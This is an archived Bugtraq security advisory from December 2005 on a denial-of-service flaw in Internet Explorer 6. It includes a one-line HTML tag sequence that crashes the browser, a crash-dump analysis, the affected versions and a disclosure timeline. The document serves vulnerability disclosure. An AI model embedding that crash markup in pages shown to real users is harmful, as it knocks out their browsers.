Ethical Hacking

Learn to find vulnerabilities before the bad guys do! Gain real world hands on hacking experience in our state of the art hacking lab. Course designed and taught by expert instructors with years of penetration testing experience. 12 student maximum in every class. Certification attempt included in every package.
Computer Forensics Training at InfoSec Institute

Gain the in-demand skills of a certified computer examiner, learn to recover trace data left behind by fraud, theft, and cybercrime perpetrators. Discover the source of computer crime and abuse at your organization so that it never happens again. All of our class sizes are guaranteed to be 12 students or less to facilitate one-on-one interaction with one of our expert instructors.




Network Security Vuln-Dev
[Top] [All Lists]
<prev [Date] next>
[Advanced]
 <prev [Thread] next>

[BuHa-Security] DoS Vulnerability in M$ IE 6 SP2 #3

from [bugtraq] Network Security [Permanent Link]
Subject: [BuHa-Security] DoS Vulnerability in M$ IE 6 SP2 #3
Date: 24 Dec 2005 23:44:50 -0000 
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

 ---------------------------------------------------
| BuHa Security-Advisory #6     |    Dec 24th, 2005 |
 ---------------------------------------------------
| Vendor   | M$ Internet Explorer 6.0               |
| URL      | http://www.microsoft.com/windows/ie/   |
| Version  | <= 6.0.2900.2180.xpsp_sp2              |
| Risk     | Low (DoS - Null Pointer Dereference)   |
 ---------------------------------------------------
 
o Description:
=============

Internet Explorer, abbreviated IE or MSIE, is a proprietary web browser
made by Microsoft and currently available as part of Microsoft Windows.

Visit http://www.microsoft.com/windows/ie/default.mspx or 
http://en.wikipedia.org/wiki/Internet_Explorer for detailed information.

o Denial of Service: <mshtml.dll>#7d6d8eba
===================

Following HTML code forces M$ IE 6 to crash:

<acronym><dd><h5><applet></caption></applet><li></h1>


Online-demo: 
http://morph3us.org/security/pen-testing/msie/ie60-1132900617750-7d6d8eba.html

These are the register values and the ASM dump at the time of the access
violation:
eax=00000000 ebx=01295390 ecx=00000000 edx=00000000 esi=0012d230
edi=01290720 eip=7d6d8eba esp=0012cd08 ebp=00000000
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000 efl=00000246

        7d6d8e84 894c2414         mov     [esp+0x14],ecx
        7d6d8e88 8b8ea4000000     mov     ecx,[esi+0xa4]
        7d6d8e8e 24fe             and     al,0xfe
        7d6d8e90 57               push    edi
        7d6d8e91 89542410         mov     [esp+0x10],edx
        7d6d8e95 8954241c         mov     [esp+0x1c],edx
        7d6d8e99 88442420         mov     [esp+0x20],al
        7d6d8e9d e89912e5ff       call    mshtml+0x7a13b (7d52a13b)
        7d6d8ea2 8b4c2428         mov     ecx,[esp+0x28]
        7d6d8ea6 68b2a06e7d       push    0x7d6ea0b2
        7d6d8eab 8bf8             mov     edi,eax
        7d6d8ead e89bb7e5ff       call    mshtml+0x8464d (7d53464d)
        7d6d8eb2 50               push    eax
        7d6d8eb3 8bcf             mov     ecx,edi
        7d6d8eb5 e8dfebfdff       call    mshtml+0x207a99 (7d6b7a99)
FAULT ->7d6d8eba 668b500c         mov     dx,[eax+0xc]
                                          ds:0023:0000000c=????
        7d6d8ebe 6685d2           test    dx,dx
        7d6d8ec1 7c39             jl      mshtml+0x228efc (7d6d8efc)
        7d6d8ec3 833d50e3747d01   cmp     dword ptr [mshtml+0x29e350
                                          (7d74e350)],0x1
        7d6d8eca 0fbffa           movsx   edi,dx
        7d6d8ecd 7513             jnz     mshtml+0x228ee2 (7d6d8ee2)
        7d6d8ecf a14ce3747d       mov     eax,[mshtml+0x29e34c
                                          (7d74e34c)]
        7d6d8ed4 8b484c           mov     ecx,[eax+0x4c]
        7d6d8ed7 8b4134           mov     eax,[ecx+0x34]
        7d6d8eda 8d147f           lea     edx,[edi+edi*2]
        7d6d8edd 8b3c90           mov     edi,[eax+edx*4]
        7d6d8ee0 eb23             jmp     mshtml+0x228f05 (7d6d8f05)

The access violation results in a null pointer dereference and is not 
exploitable. 


o Vulnerable versions:
=====================

The DoS vulnerability was successfully tested on:

M$ IE 6 SP2 - Win XP Pro SP2
M$ IE 6     - Win 2k SP4



o Disclosure Timeline:
=====================

26 Nov 05 - DoS vulnerability discovered.
15 Dec 05 - Vendor contacted.
17 Dec 05 - Vendor confirmed vulnerability.
24 Dec 05 - Public release.

o Solution:
==========

There is no patch yet. The vulnerability will be fixed in an upcoming 
service pack according to the Microsoft Security Response Center.


o Credits:
=========

Christian Deneke <bugtraq@deneke.biz>

- --

Thomas Waldegger <bugtraq@morph3us.org>
BuHa-Security Community - http://buha.info/board/

If you have questions, suggestions or criticism about the advisory feel
free to send me a mail. The address 'bugtraq@morph3us.org' is more a
spam address than a regular mail address therefore it's possible that I
ignore some mails. Please use the contact details at morph3us.org
to contact me.

Greets fly out to cyrus-tc, destructor, rhy, trappy and all members of BuHa.

Advisory online: http://morph3us.org/advisories/20051224-msie6-sp2-3.txt 

-----BEGIN PGP SIGNATURE-----
Version: n/a
Comment: http://morph3us.org/

iD8DBQFDrdu6kCo6/ctnOpYRAs1cAKCOabmBR3EtFBoMz/wKinVVpU/q/ACeK2kG
A4pamspAa8+NY9TDiCz738s=
=Wga9
-----END PGP SIGNATURE-----
[More with this subject...]




<Prev in Thread] Current Thread [Next in Thread>
  • [BuHa-Security] DoS Vulnerability in M$ IE 6 SP2 #3, bugtraq <=
Previous by Date:  [BuHa-Security] DoS Vulnerability in M$ IE 6 SP2 #2, bugtraq
Next by Date:  CFP - IT Underground 2006, Prague, Czech Republic, Piotr Sobolewski
Previous by Thread:  [BuHa-Security] DoS Vulnerability in M$ IE 6 SP2 #2, bugtraq
Next by Thread:  CFP - IT Underground 2006, Prague, Czech Republic, Piotr Sobolewski
Indexes:  [Date] [Thread] [Top] [All Lists]